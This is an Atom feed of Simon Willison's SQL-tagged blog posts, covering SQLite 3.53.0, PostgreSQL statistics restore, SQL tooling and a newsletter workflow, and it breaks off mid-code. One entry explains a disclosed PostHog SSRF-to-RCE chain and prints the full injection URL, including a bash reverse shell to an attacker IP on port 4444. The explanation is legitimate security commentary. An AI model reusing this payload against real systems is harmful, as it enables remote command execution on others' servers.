<?xml version="1.0" encoding="utf-8"?>
<feed xml:lang="en-us" xmlns="http://www.w3.org/2005/Atom"><title>Simon Willison's Weblog: sql</title><link href="http://simonwillison.net/" rel="alternate"/><link href="http://simonwillison.net/tags/sql.atom" rel="self"/><id>http://simonwillison.net/</id><updated>2026-04-11T19:56:53+00:00</updated><author><name>Simon Willison</name></author><entry><title>SQLite 3.53.0</title><link href="https://simonwillison.net/2026/Apr/11/sqlite/#atom-tag" rel="alternate"/><published>2026-04-11T19:56:53+00:00</published><updated>2026-04-11T19:56:53+00:00</updated><id>https://simonwillison.net/2026/Apr/11/sqlite/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://sqlite.org/releaselog/3_53_0.html"&gt;SQLite 3.53.0&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;SQLite 3.52.0 was withdrawn, so this is a pretty big release with a whole lot of accumulated user-facing and internal improvements. Some that stood out to me:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;ALTER TABLE&lt;/code&gt; can now add and remove &lt;code&gt;NOT NULL&lt;/code&gt; and &lt;code&gt;CHECK&lt;/code&gt; constraints - I've previously used my own &lt;a href="https://sqlite-utils.datasette.io/en/stable/python-api.html#changing-not-null-status"&gt;sqlite-utils transform() method&lt;/a&gt; for this.&lt;/li&gt;
&lt;li&gt;New &lt;a href="https://sqlite.org/json1.html#jarrayins"&gt;json_array_insert() function&lt;/a&gt; and its &lt;code&gt;jsonb&lt;/code&gt; equivalent.&lt;/li&gt;
&lt;li&gt;Significant improvements to &lt;a href="https://sqlite.org/climode.html"&gt;CLI mode&lt;/a&gt;, including result formatting.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The result formatting improvements come from a new library, the &lt;a href="https://sqlite.org/src/file/ext/qrf"&gt;Query Results Formatter&lt;/a&gt;. I &lt;a href="https://github.com/simonw/tools/pull/266"&gt;had Claude Code&lt;/a&gt; (on my phone) compile that to WebAssembly and build &lt;a href="https://tools.simonwillison.net/sqlite-qrf"&gt;this playground interface&lt;/a&gt; for trying that out.&lt;/p&gt;

    &lt;p&gt;&lt;small&gt;Via &lt;a href="https://lobste.rs/s/sqsb24/sqlite_3_53_0"&gt;Lobste.rs&lt;/a&gt;&lt;/small&gt;&lt;/p&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/sql"&gt;sql&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sqlite"&gt;sqlite&lt;/a&gt;&lt;/p&gt;



</summary><category term="sql"/><category term="sqlite"/></entry><entry><title>Syntaqlite Playground</title><link href="https://simonwillison.net/2026/Apr/5/syntaqlite/#atom-tag" rel="alternate"/><published>2026-04-05T19:32:59+00:00</published><updated>2026-04-05T19:32:59+00:00</updated><id>https://simonwillison.net/2026/Apr/5/syntaqlite/#atom-tag</id><summary type="html">
    &lt;p&gt;&lt;strong&gt;Tool:&lt;/strong&gt; &lt;a href="https://tools.simonwillison.net/syntaqlite"&gt;Syntaqlite Playground&lt;/a&gt;&lt;/p&gt;
    &lt;p&gt;Lalit Maganti's &lt;a href="https://github.com/LalitMaganti/syntaqlite"&gt;syntaqlite&lt;/a&gt; is currently being discussed &lt;a href="https://news.ycombinator.com/item?id=47648828"&gt;on Hacker News&lt;/a&gt; thanks to &lt;a href="https://lalitm.com/post/building-syntaqlite-ai/"&gt;Eight years of wanting, three months of building with AI&lt;/a&gt;, a deep dive into how it was built.&lt;/p&gt;
&lt;p&gt;This inspired me to revisit &lt;a href="https://github.com/simonw/research/tree/main/syntaqlite-python-extension#readme"&gt;a research project&lt;/a&gt; I ran when Lalit first released it a couple of weeks ago, where I tried it out and then compiled it to a WebAssembly wheel so it could run in Pyodide in a browser (the library itself uses C and Rust).&lt;/p&gt;
&lt;p&gt;This &lt;a href="https://tools.simonwillison.net/syntaqlite"&gt;new playground&lt;/a&gt; loads up the Python library and provides a UI for trying out its different features: formatting, parsing into an AST, validating, and tokenizing SQLite SQL queries.&lt;/p&gt;
&lt;p&gt;&lt;img src="https://static.simonwillison.net/static/2026/syntaqlite-playground.jpg" alt="Screenshot of a dark-themed SQL validation playground called SyntaqLite. The &amp;quot;Validate&amp;quot; tab is selected from options including Format, Parse, Validate, and Tokenize. The SQL input contains &amp;quot;SELECT id, name FROM usr WHERE active = 1&amp;quot; with a schema defining &amp;quot;users&amp;quot; and &amp;quot;posts&amp;quot; tables. Example buttons for &amp;quot;Table typo&amp;quot;, &amp;quot;Column typo&amp;quot;, and &amp;quot;Valid query&amp;quot; are shown above a red &amp;quot;Validate SQL&amp;quot; button. The Diagnostics panel shows an error for unknown table 'usr' with the suggestion &amp;quot;did you mean 'users'?&amp;quot;, and the JSON panel displays the corresponding error object with severity, message, and offset fields."&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Update&lt;/strong&gt;: not sure how I missed this but &lt;a href="https://playground.syntaqlite.com/#p=sqlite-basic-select"&gt;syntaqlite has its own WebAssembly playground&lt;/a&gt; linked to from the README.&lt;/p&gt;
    
        &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/sql"&gt;sql&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sqlite"&gt;sqlite&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/tools"&gt;tools&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai-assisted-programming"&gt;ai-assisted-programming&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/agentic-engineering"&gt;agentic-engineering&lt;/a&gt;&lt;/p&gt;
    

</summary><category term="sql"/><category term="sqlite"/><category term="tools"/><category term="ai-assisted-programming"/><category term="agentic-engineering"/></entry><entry><title>Production query plans without production data</title><link href="https://simonwillison.net/2026/Mar/9/production-query-plans-without-production-data/#atom-tag" rel="alternate"/><published>2026-03-09T15:05:15+00:00</published><updated>2026-03-09T15:05:15+00:00</updated><id>https://simonwillison.net/2026/Mar/9/production-query-plans-without-production-data/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://boringsql.com/posts/portable-stats/"&gt;Production query plans without production data&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Radim Marek describes the new &lt;a href="https://www.postgresql.org/docs/current/functions-admin.html#FUNCTIONS-ADMIN-STATSMOD"&gt;&lt;code&gt;pg_restore_relation_stats()&lt;/code&gt; and &lt;code&gt;pg_restore_attribute_stats()&lt;/code&gt; functions&lt;/a&gt; that were introduced &lt;a href="https://www.postgresql.org/docs/current/release-18.html"&gt;in PostgreSQL 18&lt;/a&gt; in September 2025.&lt;/p&gt;
&lt;p&gt;The PostgreSQL query planner makes use of internal statistics to help it decide how to best execute a query. These statistics often differ between production data and development environments, which means the query plans used in production may not be replicable in development.&lt;/p&gt;
&lt;p&gt;PostgreSQL's new features now let you copy those statistics down to your development environment, allowing you to simulate the plans for production workloads without needing to copy in all of that data first.&lt;/p&gt;
&lt;p&gt;I found this illustrative example useful:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SELECT pg_restore_attribute_stats(
    'schemaname', 'public',
    'relname', 'test_orders',
    'attname', 'status',
    'inherited', false::boolean,
    'null_frac', 0.0::real,
    'avg_width', 9::integer,
    'n_distinct', 5::real,
    'most_common_vals', '{delivered,shipped,cancelled,pending,returned}'::text,
    'most_common_freqs', '{0.95,0.015,0.015,0.015,0.005}'::real[]
);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This simulates statistics for a &lt;code&gt;status&lt;/code&gt; column that is 95% &lt;code&gt;delivered&lt;/code&gt;. Based on these statistics PostgreSQL can decide to use an index for &lt;code&gt;status = 'shipped'&lt;/code&gt; but to instead perform a full table scan for &lt;code&gt;status = 'delivered'&lt;/code&gt;.&lt;/p&gt;
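&lt;p&gt;To make that concrete, here is a minimal Python sketch of the arithmetic, assuming the planner estimates rows for an equality match on a most-common value as its frequency multiplied by the table's row count. The &lt;code&gt;reltuples&lt;/code&gt; figure of one million is a hypothetical number chosen for illustration, and &lt;code&gt;estimated_rows()&lt;/code&gt; is an illustrative helper, not a PostgreSQL API.&lt;/p&gt;

```python
# Hypothetical table size, assumed for illustration only (not from the article).
reltuples = 1_000_000

# Values and frequencies copied from the pg_restore_attribute_stats() call above.
most_common_vals = ["delivered", "shipped", "cancelled", "pending", "returned"]
most_common_freqs = [0.95, 0.015, 0.015, 0.015, 0.005]
freq_by_value = dict(zip(most_common_vals, most_common_freqs))


def estimated_rows(value):
    """Approximate row estimate for status = value: frequency times row count."""
    return round(freq_by_value[value] * reltuples)


shipped_rows = estimated_rows("shipped")
delivered_rows = estimated_rows("delivered")
print(shipped_rows, delivered_rows)
```

&lt;p&gt;With those assumed numbers a &lt;code&gt;shipped&lt;/code&gt; lookup touches a small slice of the table, which is where an index tends to pay off, while a &lt;code&gt;delivered&lt;/code&gt; lookup touches nearly all of it.&lt;/p&gt;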
&lt;p&gt;These statistics are pretty small. Radim says:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Statistics dumps are tiny. A database with hundreds of tables and thousands of columns produces a statistics dump under 1MB. The production data might be hundreds of GB. The statistics that describe it fit in a text file.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;I posted on the SQLite user forum asking if SQLite could offer a similar feature and D. Richard Hipp promptly replied &lt;a href="https://sqlite.org/forum/forumpost/480c5cb8a3898346"&gt;that it has one already&lt;/a&gt;:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;All of the data statistics used by the query planner in SQLite are available in the &lt;a href="https://sqlite.org/fileformat.html#the_sqlite_stat1_table"&gt;sqlite_stat1 table&lt;/a&gt; (or also in the &lt;a href="https://sqlite.org/fileformat.html#the_sqlite_stat4_table"&gt;sqlite_stat4 table&lt;/a&gt; if you happen to have compiled with SQLITE_ENABLE_STAT4).  That table is writable. You can inject whatever alternative statistics you like.&lt;/p&gt;
&lt;p&gt;This approach to controlling the query planner is mentioned in the documentation:
&lt;a href="https://sqlite.org/optoverview.html#manual_control_of_query_plans_using_sqlite_stat_tables"&gt;https://sqlite.org/optoverview.html#manual_control_of_query_plans_using_sqlite_stat_tables&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;See also &lt;a href="https://sqlite.org/lang_analyze.html#fixed_results_of_analyze"&gt;https://sqlite.org/lang_analyze.html#fixed_results_of_analyze&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;The ".fullschema" command in the CLI outputs both the schema and the content of the sqlite_statN tables, exactly for the reasons outlined above - so that we can reproduce query problems for testing without have to load multi-terabyte database files.&lt;/p&gt;
&lt;/blockquote&gt;
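&lt;p&gt;Here is a rough sketch of what that injection might look like from Python's &lt;code&gt;sqlite3&lt;/code&gt; module. The &lt;code&gt;orders&lt;/code&gt; table, the &lt;code&gt;idx_orders_status&lt;/code&gt; index, the &lt;code&gt;inject_stats()&lt;/code&gt; helper and the stat string are all made up for illustration. It assumes the connection is not running in defensive mode, which would block writes to &lt;code&gt;sqlite_stat1&lt;/code&gt;.&lt;/p&gt;

```python
import sqlite3


def inject_stats(conn, table, index, stat):
    """Replace the sqlite_stat1 row for one index, then ask SQLite to reload it."""
    # ANALYZE creates sqlite_stat1 if it does not exist yet.
    conn.execute("ANALYZE")
    conn.execute(
        "DELETE FROM sqlite_stat1 WHERE tbl = ? AND idx = ?", (table, index)
    )
    conn.execute(
        "INSERT INTO sqlite_stat1 (tbl, idx, stat) VALUES (?, ?, ?)",
        (table, index, stat),
    )
    # Forces the query planner to re-read the sqlite_stat tables.
    conn.execute("ANALYZE sqlite_master")
    conn.commit()


conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE orders (id INTEGER PRIMARY KEY, status TEXT)")
conn.execute("CREATE INDEX idx_orders_status ON orders (status)")
conn.executemany(
    "INSERT INTO orders (status) VALUES (?)", [("delivered",), ("shipped",)]
)

# Pretend the table has a million rows, averaging 200,000 rows per status value.
inject_stats(conn, "orders", "idx_orders_status", "1000000 200000")
rows = conn.execute("SELECT tbl, idx, stat FROM sqlite_stat1").fetchall()
print(rows)
```

&lt;p&gt;The stat string follows the &lt;code&gt;sqlite_stat1&lt;/code&gt; format: the first integer is the approximate number of rows in the index, the second is the average number of rows matching a single value of the first indexed column.&lt;/p&gt;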

    &lt;p&gt;&lt;small&gt;Via &lt;a href="https://lobste.rs/s/o8vbb7/production_query_plans_without"&gt;Lobste.rs&lt;/a&gt;&lt;/small&gt;&lt;/p&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/databases"&gt;databases&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/postgresql"&gt;postgresql&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sql"&gt;sql&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sqlite"&gt;sqlite&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/d-richard-hipp"&gt;d-richard-hipp&lt;/a&gt;&lt;/p&gt;



</summary><category term="databases"/><category term="postgresql"/><category term="sql"/><category term="sqlite"/><category term="d-richard-hipp"/></entry><entry><title>The most popular blogs of Hacker News in 2025</title><link href="https://simonwillison.net/2026/Jan/2/most-popular-blogs-of-hacker-news/#atom-tag" rel="alternate"/><published>2026-01-02T19:10:43+00:00</published><updated>2026-01-02T19:10:43+00:00</updated><id>https://simonwillison.net/2026/Jan/2/most-popular-blogs-of-hacker-news/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://refactoringenglish.com/blog/2025-hn-top-5/"&gt;The most popular blogs of Hacker News in 2025&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Michael Lynch maintains &lt;a href="https://refactoringenglish.com/tools/hn-popularity/"&gt;HN Popularity Contest&lt;/a&gt;, a site that tracks personal blogs on Hacker News and scores them based on how well they perform on that platform.&lt;/p&gt;
&lt;p&gt;The engine behind the project is the &lt;a href="https://github.com/mtlynch/hn-popularity-contest-data/blob/master/data/domains-meta.csv"&gt;domains-meta.csv&lt;/a&gt; CSV on GitHub, a hand-curated list of known personal blogs with author, bio and tag metadata, which Michael uses to separate out personal blog posts from other types of content.&lt;/p&gt;
&lt;p&gt;I came top of the rankings in 2023, 2024 and 2025 but I'm listed &lt;a href="https://refactoringenglish.com/tools/hn-popularity/"&gt;in third place&lt;/a&gt; for all time behind Paul Graham and Brian Krebs.&lt;/p&gt;
&lt;p&gt;I dug around in the browser inspector and was delighted to find that the data powering the site is served with open CORS headers, which means you can easily explore it with external services like Datasette Lite.&lt;/p&gt;
&lt;p&gt;Here's a convoluted window function query Claude Opus 4.5 &lt;a href="https://claude.ai/share/8e1cb294-0ff0-4d5b-b83f-58e4c7fdb0d2"&gt;wrote for me&lt;/a&gt; which, for a given domain, shows where that domain ranked for each year since it first appeared in the dataset:&lt;/p&gt;
&lt;pre&gt;&lt;span class="pl-s"&gt;with yearly_scores as (&lt;/span&gt;
&lt;span class="pl-s"&gt;  select &lt;/span&gt;
&lt;span class="pl-s"&gt;    domain,&lt;/span&gt;
&lt;span class="pl-s"&gt;    strftime('%Y', date) as year,&lt;/span&gt;
&lt;span class="pl-s"&gt;    sum(score) as total_score,&lt;/span&gt;
&lt;span class="pl-s"&gt;    count(distinct date) as days_mentioned&lt;/span&gt;
&lt;span class="pl-s"&gt;  from "hn-data"&lt;/span&gt;
&lt;span class="pl-s"&gt;  group by domain, strftime('%Y', date)&lt;/span&gt;
&lt;span class="pl-s"&gt;),&lt;/span&gt;
&lt;span class="pl-s"&gt;ranked as (&lt;/span&gt;
&lt;span class="pl-s"&gt;  select &lt;/span&gt;
&lt;span class="pl-s"&gt;    domain,&lt;/span&gt;
&lt;span class="pl-s"&gt;    year,&lt;/span&gt;
&lt;span class="pl-s"&gt;    total_score,&lt;/span&gt;
&lt;span class="pl-s"&gt;    days_mentioned,&lt;/span&gt;
&lt;span class="pl-s"&gt;    rank() over (partition by year order by total_score desc) as rank&lt;/span&gt;
&lt;span class="pl-s"&gt;  from yearly_scores&lt;/span&gt;
&lt;span class="pl-s"&gt;)&lt;/span&gt;
&lt;span class="pl-s"&gt;select &lt;/span&gt;
&lt;span class="pl-s"&gt;  r.year,&lt;/span&gt;
&lt;span class="pl-s"&gt;  r.total_score,&lt;/span&gt;
&lt;span class="pl-s"&gt;  r.rank,&lt;/span&gt;
&lt;span class="pl-s"&gt;  r.days_mentioned&lt;/span&gt;
&lt;span class="pl-s"&gt;from ranked r&lt;/span&gt;
&lt;span class="pl-s"&gt;where r.domain = :domain&lt;/span&gt;
&lt;span class="pl-s"&gt;  and r.year &amp;gt;= (&lt;/span&gt;
&lt;span class="pl-s"&gt;    select min(strftime('%Y', date)) &lt;/span&gt;
&lt;span class="pl-s"&gt;    from "hn-data"&lt;/span&gt;
&lt;span class="pl-s"&gt;    where domain = :domain&lt;/span&gt;
&lt;span class="pl-s"&gt;  )&lt;/span&gt;
&lt;span class="pl-s"&gt;order by r.year desc&lt;/span&gt;&lt;/pre&gt;

&lt;p&gt;(I just noticed that the last &lt;code&gt;and r.year &amp;gt;= (&lt;/code&gt; clause isn't actually needed here.)&lt;/p&gt;
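&lt;p&gt;The clause is redundant because the &lt;code&gt;ranked&lt;/code&gt; CTE only contains rows for years in which the domain actually appears. Here is a small Python sketch of the simplified query, run against a made-up in-memory &lt;code&gt;hn-data&lt;/code&gt; table. The &lt;code&gt;a.example&lt;/code&gt; and &lt;code&gt;b.example&lt;/code&gt; domains and their scores are invented for illustration, and it assumes a SQLite build with window function support (3.25 or later).&lt;/p&gt;

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute('CREATE TABLE "hn-data" (domain TEXT, date TEXT, score INTEGER)')
# Invented sample rows: two domains across two years.
conn.executemany(
    'INSERT INTO "hn-data" VALUES (?, ?, ?)',
    [
        ("a.example", "2024-01-05", 100),
        ("b.example", "2024-02-01", 300),
        ("a.example", "2025-03-10", 500),
        ("a.example", "2025-03-11", 50),
        ("b.example", "2025-06-01", 200),
    ],
)

# Same query as above, minus the unnecessary "and r.year ..." subquery.
query = """
with yearly_scores as (
  select
    domain,
    strftime('%Y', date) as year,
    sum(score) as total_score,
    count(distinct date) as days_mentioned
  from "hn-data"
  group by domain, strftime('%Y', date)
),
ranked as (
  select
    domain,
    year,
    total_score,
    days_mentioned,
    rank() over (partition by year order by total_score desc) as rank
  from yearly_scores
)
select r.year, r.total_score, r.rank, r.days_mentioned
from ranked r
where r.domain = :domain
order by r.year desc
"""

results = conn.execute(query, {"domain": "a.example"}).fetchall()
for row in results:
    print(row)
```

&lt;p&gt;Each result row is &lt;code&gt;(year, total_score, rank, days_mentioned)&lt;/code&gt;, newest year first.&lt;/p&gt;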
&lt;p&gt;My &lt;a href="https://lite.datasette.io/?csv=https://hn-popularity.cdn.refactoringenglish.com/hn-data.csv#/data?sql=with+yearly_scores+as+%28%0A++select+%0A++++domain%2C%0A++++strftime%28%27%25Y%27%2C+date%29+as+year%2C%0A++++sum%28score%29+as+total_score%2C%0A++++count%28distinct+date%29+as+days_mentioned%0A++from+%22hn-data%22%0A++group+by+domain%2C+strftime%28%27%25Y%27%2C+date%29%0A%29%2C%0Aranked+as+%28%0A++select+%0A++++domain%2C%0A++++year%2C%0A++++total_score%2C%0A++++days_mentioned%2C%0A++++rank%28%29+over+%28partition+by+year+order+by+total_score+desc%29+as+rank%0A++from+yearly_scores%0A%29%0Aselect+%0A++r.year%2C%0A++r.total_score%2C%0A++r.rank%2C%0A++r.days_mentioned%0Afrom+ranked+r%0Awhere+r.domain+%3D+%3Adomain%0A++and+r.year+%3E%3D+%28%0A++++select+min%28strftime%28%27%25Y%27%2C+date%29%29+%0A++++from+%22hn-data%22%0A++++where+domain+%3D+%3Adomain%0A++%29%0Aorder+by+r.year+desc&amp;amp;domain=simonwillison.net"&gt;simonwillison.net results&lt;/a&gt; show me ranked 3rd in 2022, 30th in 2021 and 85th back in 2007 - though I expect there are many personal blogs from that year which haven't yet been manually added to Michael's list.&lt;/p&gt;
&lt;p&gt;Also useful is that every domain gets its own CORS-enabled CSV file with details of the actual Hacker News submissions from that domain, e.g. &lt;code&gt;https://hn-popularity.cdn.refactoringenglish.com/domains/simonwillison.net.csv&lt;/code&gt;. Here's &lt;a href="https://lite.datasette.io/?csv=https://hn-popularity.cdn.refactoringenglish.com/domains/simonwillison.net.csv#/data/simonwillison"&gt;that one in Datasette Lite&lt;/a&gt;.&lt;/p&gt;

    &lt;p&gt;&lt;small&gt;Via &lt;a href="https://news.ycombinator.com/item?id=46465819"&gt;Hacker News&lt;/a&gt;&lt;/small&gt;&lt;/p&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/hacker-news"&gt;hacker-news&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sql"&gt;sql&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sqlite"&gt;sqlite&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/datasette"&gt;datasette&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/datasette-lite"&gt;datasette-lite&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/cors"&gt;cors&lt;/a&gt;&lt;/p&gt;



</summary><category term="hacker-news"/><category term="sql"/><category term="sqlite"/><category term="datasette"/><category term="datasette-lite"/><category term="cors"/></entry><entry><title>Inside PostHog: How SSRF, a ClickHouse SQL Escaping 0day, and Default PostgreSQL Credentials Formed an RCE Chain</title><link href="https://simonwillison.net/2025/Dec/18/ssrf-clickhouse-postgresql/#atom-tag" rel="alternate"/><published>2025-12-18T01:42:22+00:00</published><updated>2025-12-18T01:42:22+00:00</updated><id>https://simonwillison.net/2025/Dec/18/ssrf-clickhouse-postgresql/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://mdisec.com/inside-posthog-how-ssrf-a-clickhouse-sql-escaping-0day-and-default-postgresql-credentials-formed-an-rce-chain-zdi-25-099-zdi-25-097-zdi-25-096/"&gt;Inside PostHog: How SSRF, a ClickHouse SQL Escaping 0day, and Default PostgreSQL Credentials Formed an RCE Chain&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Mehmet Ince describes a very elegant chain of attacks against the PostHog analytics platform, combining several different vulnerabilities (now all reported and fixed) to achieve RCE - Remote Code Execution - against an internal PostgreSQL server.&lt;/p&gt;
&lt;p&gt;The way in abuses a webhooks system with non-robust URL validation, setting up an SSRF (Server-Side Request Forgery) attack where the server makes a request against an internal network resource.&lt;/p&gt;
&lt;p&gt;Here's the URL that gets injected:&lt;/p&gt;
&lt;p&gt;&lt;code style="word-break: break-all"&gt;http://clickhouse:8123/?query=SELECT+*+FROM+postgresql('db:5432','posthog',\"posthog_use'))+TO+STDOUT;END;DROP+TABLE+IF+EXISTS+cmd_exec;CREATE+TABLE+cmd_exec(cmd_output+text);COPY+cmd_exec+FROM+PROGRAM+$$bash+-c+\\"bash+-i+&amp;gt;%26+/dev/tcp/172.31.221.180/4444+0&amp;gt;%261\\"$$;SELECT+*+FROM+cmd_exec;+--\",'posthog','posthog')#&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;Reformatted a little for readability:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;http://clickhouse:8123/?query=
SELECT *
FROM postgresql(
    'db:5432',
    'posthog',
    "posthog_use')) TO STDOUT;
    END;
    DROP TABLE IF EXISTS cmd_exec;
    CREATE TABLE cmd_exec (
        cmd_output text
    );
    COPY cmd_exec
    FROM PROGRAM $$
        bash -c \"bash -i &amp;gt;&amp;amp; /dev/tcp/172.31.221.180/4444 0&amp;gt;&amp;amp;1\"
    $$;
    SELECT * FROM cmd_exec;
    --",
    'posthog',
    'posthog'
)
#
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This abuses ClickHouse's ability to &lt;a href="https://clickhouse.com/docs/sql-reference/table-functions/postgresql#implementation-details"&gt;run its own queries against PostgreSQL&lt;/a&gt; using the &lt;code&gt;postgresql()&lt;/code&gt; table function, combined with an escaping bug in ClickHouse's PostgreSQL function (&lt;a href="https://github.com/ClickHouse/ClickHouse/pull/74144"&gt;since fixed&lt;/a&gt;). Then &lt;em&gt;that&lt;/em&gt; query abuses PostgreSQL's ability to run shell commands via &lt;code&gt;COPY ... FROM PROGRAM&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;The &lt;code&gt;bash -c&lt;/code&gt; bit is particularly nasty - it opens a reverse shell such that an attacker with a machine at that IP address listening on port 4444 will receive a connection from the PostgreSQL server that can then be used to execute arbitrary commands.&lt;/p&gt;

    &lt;p&gt;&lt;small&gt;Via &lt;a href="https://news.ycombinator.com/item?id=46305321"&gt;Hacker News&lt;/a&gt;&lt;/small&gt;&lt;/p&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/postgresql"&gt;postgresql&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/security"&gt;security&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sql"&gt;sql&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sql-injection"&gt;sql-injection&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/webhooks"&gt;webhooks&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/clickhouse"&gt;clickhouse&lt;/a&gt;&lt;/p&gt;



</summary><category term="postgresql"/><category term="security"/><category term="sql"/><category term="sql-injection"/><category term="webhooks"/><category term="clickhouse"/></entry><entry><title>How I automate my Substack newsletter with content from my blog</title><link href="https://simonwillison.net/2025/Nov/19/how-i-automate-my-substack-newsletter/#atom-tag" rel="alternate"/><published>2025-11-19T22:00:34+00:00</published><updated>2025-11-19T22:00:34+00:00</updated><id>https://simonwillison.net/2025/Nov/19/how-i-automate-my-substack-newsletter/#atom-tag</id><summary type="html">
    &lt;p&gt;I sent out &lt;a href="https://simonw.substack.com/p/trying-out-gemini-3-pro-with-audio"&gt;my weekly-ish Substack newsletter&lt;/a&gt; this morning and took the opportunity to record &lt;a href="https://www.youtube.com/watch?v=BoPZltKDM-s"&gt;a YouTube video&lt;/a&gt; demonstrating my process and describing the different components that make it work. There's a &lt;em&gt;lot&lt;/em&gt; of digital duct tape involved, taking the content from Django+Heroku+PostgreSQL to GitHub Actions to SQLite+Datasette+Fly.io to JavaScript+Observable and finally to Substack.&lt;/p&gt;

&lt;p&gt;&lt;lite-youtube videoid="BoPZltKDM-s" js-api="js-api"
  title="How I automate my Substack newsletter with content from my blog"
  playlabel="Play: How I automate my Substack newsletter with content from my blog"
&gt; &lt;/lite-youtube&gt;&lt;/p&gt;

&lt;p&gt;The core process is the same as I described &lt;a href="https://simonwillison.net/2023/Apr/4/substack-observable/"&gt;back in 2023&lt;/a&gt;. I have an Observable notebook called &lt;a href="https://observablehq.com/@simonw/blog-to-newsletter"&gt;blog-to-newsletter&lt;/a&gt; which fetches content from my blog's database, filters out anything that has been in the newsletter before, formats what's left as HTML and offers a big "Copy rich text newsletter to clipboard" button.&lt;/p&gt;
&lt;p&gt;&lt;img src="https://static.simonwillison.net/static/2025/copy-to-newsletter.jpg" alt="Screenshot of the interface. An item in a list says 9080: Trying out Gemini 3 Pro with audio transcription and a new pelican benchmark. A huge button reads Copy rich text newsletter to clipboard - below is a smaller button that says Copy just the links/quotes/TILs. A Last X days slider is set to 2. There are checkboxes for SKip content sent in prior newsletters and only include post content prior to the cutoff comment." style="max-width: 100%;" /&gt;&lt;/p&gt;
&lt;p&gt;I click that button, paste the result into the Substack editor, tweak a few things and hit send. The whole process usually takes just a few minutes.&lt;/p&gt;
&lt;p&gt;I make very minor edits:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;I set the title and the subheading for the newsletter. This is often a direct copy of the title of the featured blog post.&lt;/li&gt;
&lt;li&gt;Substack turns YouTube URLs into embeds, which often isn't what I want - especially if I have a YouTube URL inside a code example.&lt;/li&gt;
&lt;li&gt;Blocks of preformatted text often have an extra blank line at the end, which I remove.&lt;/li&gt;
&lt;li&gt;Occasionally I'll make a content edit - removing a piece of content that doesn't fit the newsletter, or fixing a time reference like "yesterday" that doesn't make sense any more.&lt;/li&gt;
&lt;li&gt;I pick the featured image for the newsletter and add some tags.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;That's the whole process!&lt;/p&gt;
&lt;h4 id="the-observable-notebook"&gt;The Observable notebook&lt;/h4&gt;
&lt;p&gt;The most important cell in the Observable notebook is this one:&lt;/p&gt;
&lt;div class="highlight highlight-source-js"&gt;&lt;pre&gt;&lt;span class="pl-s1"&gt;raw_content&lt;/span&gt; &lt;span class="pl-c1"&gt;=&lt;/span&gt; &lt;span class="pl-kos"&gt;{&lt;/span&gt;
  &lt;span class="pl-c1"&gt;return&lt;/span&gt; &lt;span class="pl-s1"&gt;await&lt;/span&gt; &lt;span class="pl-kos"&gt;(&lt;/span&gt;
    &lt;span class="pl-k"&gt;await&lt;/span&gt; &lt;span class="pl-en"&gt;fetch&lt;/span&gt;&lt;span class="pl-kos"&gt;(&lt;/span&gt;
      &lt;span class="pl-s"&gt;`https://datasette.simonwillison.net/simonwillisonblog.json?sql=&lt;span class="pl-s1"&gt;&lt;span class="pl-kos"&gt;${&lt;/span&gt;&lt;span class="pl-en"&gt;encodeURIComponent&lt;/span&gt;&lt;span class="pl-kos"&gt;(&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;
&lt;span class="pl-s"&gt;&lt;span class="pl-s1"&gt;        &lt;span class="pl-s1"&gt;sql&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;
